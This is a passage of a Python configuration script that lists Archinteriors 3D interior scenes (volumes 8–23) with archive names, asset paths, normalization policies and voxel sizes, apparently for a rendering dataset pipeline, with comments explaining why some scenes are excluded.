scenes.append({"name": "ai_008_007", "archive_file": "AI8_07.rar", "asset_file": "07", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_008", "archive_file": "AI8_08.rar", "asset_file": "08", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_009", "archive_file": "AI8_09.rar", "asset_file": "09", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_008_010", "archive_file": "AI8_10.rar", "asset_file": "010", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_001", "archive_file": "AI9_SCENE 01.rar", "asset_file": "SCENE 01", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_002", "archive_file": "AI9_SCENE 02.rar", "asset_file": "SCENE 02", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_003", "archive_file": "AI9_SCENE 03.rar", "asset_file": "SCENE 03", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_004", "archive_file": "AI9_SCENE 04.rar", "asset_file": "SCENE 04", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_005", "archive_file": "AI9_SCENE 05.rar", "asset_file": "SCENE 05", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_006", "archive_file": "AI9_SCENE 06.rar", "asset_file": "SCENE 06", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_007", "archive_file": "AI9_SCENE 07.rar", "asset_file": "SCENE 07", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_008", "archive_file": "AI9_SCENE 08.rar", "asset_file": "SCENE 08", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_009_009", "archive_file": "AI9_SCENE 09.rar", "asset_file": "SCENE 09", "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generates error during export: vertex coordinate too big adjust object-scale
# scenes.append({"name": "ai_009_010", "archive_file": "AI9_SCENE 10.rar", "asset_file": "SCENE 10", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
#
# Archinteriors volumes 10-19
#
scenes.append({"name": "ai_010_001", "archive_file": "AI10_001.RAR", "asset_file": "001", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_002", "archive_file": "AI10_002.RAR", "asset_file": "002", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_003", "archive_file": "AI10_003.RAR", "asset_file": "003", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_004", "archive_file": "AI10_004.RAR", "asset_file": "004", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_005", "archive_file": "AI10_005.RAR", "asset_file": "005", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_006", "archive_file": "AI10_006.RAR", "asset_file": "006", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_007", "archive_file": "AI10_007.RAR", "asset_file": "007", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_008", "archive_file": "AI10_008.RAR", "asset_file": "008", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_010_009", "archive_file": "AI10_009.RAR", "asset_file": "009", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_010_010", "archive_file": "AI10_010.RAR", "asset_file": "010", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_001", "archive_file": "AI11_01.rar", "asset_file": "01", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generates error during export: vertex coordinate too big adjust object-scale
# scenes.append({"name": "ai_011_002", "archive_file": "AI11_02.rar", "asset_file": "02", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_003", "archive_file": "AI11_03.rar", "asset_file": "03", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_004", "archive_file": "AI11_04.rar", "asset_file": "04", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_005", "archive_file": "AI11_05.rar", "asset_file": "05", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_006", "archive_file": "AI11_06.rar", "asset_file": "06", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_007", "archive_file": "AI11_07.rar", "asset_file": "07", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_008", "archive_file": "AI11_08.rar", "asset_file": "08", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_009", "archive_file": "AI11_09.rar", "asset_file": "09", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_011_010", "archive_file": "AI11_10.rar", "asset_file": "10", "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_001", "archive_file": "archinteriors_vol_012_scene_001.rar", "asset_file": os.path.join("ArchInteriors_12_01", "ArchInteriors_12_01"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_002", "archive_file": "archinteriors_vol_012_scene_002.rar", "asset_file": os.path.join("ArchInteriors_12_02", "ArchInteriors_12_02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_003", "archive_file": "archinteriors_vol_012_scene_003.rar", "asset_file": os.path.join("ArchInteriors_12_03", "ArchInteriors_12_03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_004", "archive_file": "archinteriors_vol_012_scene_004.rar", "asset_file": os.path.join("ArchInteriors_12_04", "ArchInteriors_12_04"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_005", "archive_file": "archinteriors_vol_012_scene_005.rar", "asset_file": os.path.join("ArchInteriors_12_05", "ArchInteriors_12_05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_006", "archive_file": "archinteriors_vol_012_scene_006.rar", "asset_file": os.path.join("ArchInteriors_12_06", "ArchInteriors_12_06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_007", "archive_file": "archinteriors_vol_012_scene_007.rar", "asset_file": os.path.join("ArchInteriors_12_07", "ArchInteriors_12_07"), "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_008", "archive_file": "archinteriors_vol_012_scene_008.rar", "asset_file": os.path.join("ArchInteriors_12_08", "ArchInteriors_12_08"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_009", "archive_file": "archinteriors_vol_012_scene_009.rar", "asset_file": os.path.join("ArchInteriors_12_09", "ArchInteriors_12_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_012_010", "archive_file": "archinteriors_vol_012_scene_010.rar", "asset_file": os.path.join("ArchInteriors_12_10", "ArchInteriors_12_10"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_001", "archive_file": "archinteriors_vol13_01.rar", "asset_file": os.path.join("archinteriors_vol13_01", "001"), "normalization_policy": "v2", "scene_extent_meters": 500.0, "voxel_extent_meters": 1.0})
scenes.append({"name": "ai_013_002", "archive_file": "archinteriors_vol13_02.rar", "asset_file": os.path.join("archinteriors_vol13_02", "002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_003", "archive_file": "archinteriors_vol13_03.rar", "asset_file": os.path.join("archinteriors_vol13_03", "003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_004", "archive_file": "archinteriors_vol13_04.rar", "asset_file": os.path.join("archinteriors_vol13_04", "004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_005", "archive_file": "archinteriors_vol13_05.rar", "asset_file": os.path.join("archinteriors_vol13_05", "005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_006", "archive_file": "archinteriors_vol13_06.rar", "asset_file": os.path.join("archinteriors_vol13_06", "006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_007", "archive_file": "archinteriors_vol13_07.rar", "asset_file": os.path.join("archinteriors_vol13_07", "007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_008", "archive_file": "archinteriors_vol13_08.rar", "asset_file": os.path.join("archinteriors_vol13_08", "008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_009", "archive_file": "archinteriors_vol13_09.rar", "asset_file": os.path.join("archinteriors_vol13_09", "009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_013_010", "archive_file": "archinteriors_vol13_10.rar", "asset_file": os.path.join("archinteriors_vol13_10", "010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_001", "archive_file": "archinteriors_vol_014_scene_001.rar", "asset_file": os.path.join("ArchInteriors_14_01", "Archinteriors_14_01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_002", "archive_file": "archinteriors_vol_014_scene_002.rar", "asset_file": os.path.join("ArchInteriors_14_02", "Archinteriors_14_02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_003", "archive_file": "archinteriors_vol_014_scene_003.rar", "asset_file": os.path.join("ArchInteriors_14_03", "Archinteriors_14_03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_004", "archive_file": "archinteriors_vol_014_scene_004.rar", "asset_file": os.path.join("ArchInteriors_14_04", "Archinteriors_14_04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_005", "archive_file": "archinteriors_vol_014_scene_005.rar", "asset_file": os.path.join("ArchInteriors_14_05", "Archinteriors_14_05"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_006", "archive_file": "archinteriors_vol_014_scene_006.rar", "asset_file": os.path.join("ArchInteriors_14_06", "Archinteriors_14_06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# slightly bad lighting
# scenes.append({"name": "ai_014_007", "archive_file": "archinteriors_vol_014_scene_007.rar", "asset_file": os.path.join("ArchInteriors_14_07", "Archinteriors_14_07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_008", "archive_file": "archinteriors_vol_014_scene_008.rar", "asset_file": os.path.join("ArchInteriors_14_08", "Archinteriors_14_08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_009", "archive_file": "archinteriors_vol_014_scene_009.rar", "asset_file": os.path.join("ArchInteriors_14_09", "Archinteriors_14_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_014_010", "archive_file": "archinteriors_vol_014_scene_010.rar", "asset_file": os.path.join("ArchInteriors_14_10", "Archinteriors_14_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_001", "archive_file": "archinteriors_vol_015_scene_001.rar", "asset_file": os.path.join("001", "archinteriors15_1"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_002", "archive_file": "archinteriors_vol_015_scene_002.rar", "asset_file": os.path.join("002", "archinteriors15_2"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_003", "archive_file": "archinteriors_vol_015_scene_003.rar", "asset_file": os.path.join("003", "archinteriors15_3"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_004", "archive_file": "archinteriors_vol_015_scene_004.rar", "asset_file": os.path.join("004", "archinteriors15_4"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_005", "archive_file": "archinteriors_vol_015_scene_005.rar", "asset_file": os.path.join("005", "archinteriors15_5"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_006", "archive_file": "archinteriors_vol_015_scene_006.rar", "asset_file": os.path.join("006", "archinteriors15_6"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_007", "archive_file": "archinteriors_vol_015_scene_007.rar", "asset_file": os.path.join("007", "archinteriors15_7"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_008", "archive_file": "archinteriors_vol_015_scene_008.rar", "asset_file": os.path.join("008", "archinteriors15_8"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_009", "archive_file": "archinteriors_vol_015_scene_009.rar", "asset_file": os.path.join("009", "archinteriors15_9"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_015_010", "archive_file": "archinteriors_vol_015_scene_010.rar", "asset_file": os.path.join("010", "archinteriors15_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_001", "archive_file": "archinteriors_vol_016_scene_001.rar", "asset_file": os.path.join("01", "archinteriors16_1"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_002", "archive_file": "archinteriors_vol_016_scene_002.rar", "asset_file": os.path.join("02", "archinteriors16_2"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_003", "archive_file": "archinteriors_vol_016_scene_003.rar", "asset_file": os.path.join("03", "archinteriors_16_3"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_004", "archive_file": "archinteriors_vol_016_scene_004.rar", "asset_file": os.path.join("04", "archinteriors_16_4"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_005", "archive_file": "archinteriors_vol_016_scene_005.rar", "asset_file": os.path.join("05", "archinteriors_15_5"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_006", "archive_file": "archinteriors_vol_016_scene_006.rar", "asset_file": os.path.join("06", "archinteriors_16_6"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_007", "archive_file": "archinteriors_vol_016_scene_007.rar", "asset_file": os.path.join("07", "archinteriors_16_07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_008", "archive_file": "archinteriors_vol_016_scene_008.rar", "asset_file": os.path.join("08", "archinteriors_16_08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_009", "archive_file": "archinteriors_vol_016_scene_009.rar", "asset_file": os.path.join("09", "archinteriors_16_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_016_010", "archive_file": "archinteriors_vol_016_scene_010.rar", "asset_file": os.path.join("10", "archinteriors_16_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_001", "archive_file": "archinteriors_vol_017_scene_001.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_001", "Archinteriors_17_01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_002", "archive_file": "archinteriors_vol_017_scene_002.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_002", "Archinteriors_17_02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_003", "archive_file": "archinteriors_vol_017_scene_003.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_003", "Archinteriors_17_03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_004", "archive_file": "archinteriors_vol_017_scene_004.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_004", "Archinteriors_17_04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_005", "archive_file": "archinteriors_vol_017_scene_005.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_005", "Archinteriors_17_05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_006", "archive_file": "archinteriors_vol_017_scene_006.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_006", "Archinteriors_17_06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_007", "archive_file": "archinteriors_vol_017_scene_007.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_007", "archinteriors17_07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_008", "archive_file": "archinteriors_vol_017_scene_008.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_008", "archinteriors17_08"), "normalization_policy": "v0", "scene_extent_meters": 50.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_009", "archive_file": "archinteriors_vol_017_scene_009.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_009", "archinteriors17_09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_017_010", "archive_file": "archinteriors_vol_017_scene_010.rar", "asset_file": os.path.join("archinteriors_vol_017_scene_010", "archinteriors17_10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_001", "archive_file": "Archinteriors_vol_18_001.rar", "asset_file": os.path.join("001", "001"), "normalization_policy": "v2", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_002", "archive_file": "Archinteriors_vol_18_002.rar", "asset_file": os.path.join("002", "002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_003", "archive_file": "Archinteriors_vol_18_003.rar", "asset_file": "Archinteriors_vol_18_003", "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_004", "archive_file": "Archinteriors_vol_18_004.rar", "asset_file": os.path.join("004", "004"), "normalization_policy": "v1", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_005", "archive_file": "Archinteriors_vol_18_005.rar", "asset_file": os.path.join("005", "005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_006", "archive_file": "Archinteriors_vol_18_006.rar", "asset_file": os.path.join("006", "006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_007", "archive_file": "Archinteriors_vol_18_007.rar", "asset_file": os.path.join("007", "007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_008", "archive_file": "Archinteriors_vol_18_008.rar", "asset_file": os.path.join("008", "008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_009", "archive_file": "Archinteriors_vol_18_009.rar", "asset_file": os.path.join("009", "009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_018_010", "archive_file": "Archinteriors_vol_18_010.rar", "asset_file": os.path.join("010", "010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_001", "archive_file": "Archinteriors_19_001.rar", "asset_file": os.path.join("001", "AI19_001"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_002", "archive_file": "Archinteriors_19_002.rar", "asset_file": os.path.join("002", "AI19_002"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_003", "archive_file": "Archinteriors_19_003.rar", "asset_file": os.path.join("003", "AI19_003"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_004", "archive_file": "Archinteriors_19_004.rar", "asset_file": os.path.join("004", "AI19_004"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_019_005", "archive_file": "Archinteriors_19_005.rar", "asset_file": os.path.join("005", "AI19_005"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_006", "archive_file": "Archinteriors_19_006.rar", "asset_file": os.path.join("006", "AI19_006"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_007", "archive_file": "Archinteriors_19_007.rar", "asset_file": os.path.join("007", "AI19_007"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_008", "archive_file": "Archinteriors_19_008.rar", "asset_file": os.path.join("008", "AI19_008"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_019_009", "archive_file": "Archinteriors_19_009.rar", "asset_file": os.path.join("009", "AI19_009"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_019_010", "archive_file": "Archinteriors_19_010.rar", "asset_file": os.path.join("010", "AI19_010"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
#
# Archinteriors volumes 20-29
#
# Archinteriors volume 20 is not distributed under the "Royalty Free Licence - All Extended Uses" license, so we exclude it
scenes.append({"name": "ai_021_001", "archive_file": "Archinteriors_21_01.rar", "asset_file": os.path.join("01", "01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_002", "archive_file": "Archinteriors_21_02.rar", "asset_file": os.path.join("02", "02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_003", "archive_file": "Archinteriors_21_03.rar", "asset_file": os.path.join("03", "03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_021_004", "archive_file": "Archinteriors_21_04.rar", "asset_file": os.path.join("04", "04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# generate_merged_gi_files.py is very slow
# scenes.append({"name": "ai_021_005", "archive_file": "Archinteriors_21_05.rar", "asset_file": os.path.join("05", "05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
# bad lighting
# scenes.append({"name": "ai_021_006", "archive_file": "Archinteriors_21_06.rar", "asset_file": os.path.join("06", "06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_007", "archive_file": "Archinteriors_21_07.rar", "asset_file": os.path.join("07", "07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_008", "archive_file": "Archinteriors_21_08.rar", "asset_file": os.path.join("08", "08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_009", "archive_file": "Archinteriors_21_09.rar", "asset_file": os.path.join("09", "09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_021_010", "archive_file": "Archinteriors_21_10.rar", "asset_file": os.path.join("10", "10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_001", "archive_file": "Archinteriors_22_01.rar", "asset_file": os.path.join("01", "01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_002", "archive_file": "Archinteriors_22_02.rar", "asset_file": os.path.join("02", "02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_003", "archive_file": "Archinteriors_22_03.rar", "asset_file": os.path.join("03", "03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_004", "archive_file": "Archinteriors_22_04.rar", "asset_file": os.path.join("04", "04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_005", "archive_file": "Archinteriors_22_05.rar", "asset_file": os.path.join("05", "05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_006", "archive_file": "Archinteriors_22_06.rar", "asset_file": os.path.join("06", "06"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_007", "archive_file": "Archinteriors_22_07.rar", "asset_file": os.path.join("07", "07"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_008", "archive_file": "Archinteriors_22_08.rar", "asset_file": os.path.join("08", "08"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_009", "archive_file": "Archinteriors_22_09.rar", "asset_file": os.path.join("09", "09"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_022_010", "archive_file": "Archinteriors_22_10.rar", "asset_file": os.path.join("10", "10"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_001", "archive_file": "Archinteriors_23_01.part1.rar", "asset_file": os.path.join("01", "01"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_002", "archive_file": "Archinteriors_23_02.part1.rar", "asset_file": os.path.join("02", "02"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_003", "archive_file": "Archinteriors_23_03.part1.rar", "asset_file": os.path.join("03", "03"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_004", "archive_file": "Archinteriors_23_04.part1.rar", "asset_file": os.path.join("04", "04"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
scenes.append({"name": "ai_023_005", "archive_file": "Archinteriors_23_05.part1.rar", "asset_file": os.path.join("05", "05"), "normalization_policy": "v0", "scene_extent_meters": 30.0, "voxel_extent_meters": 0.1})
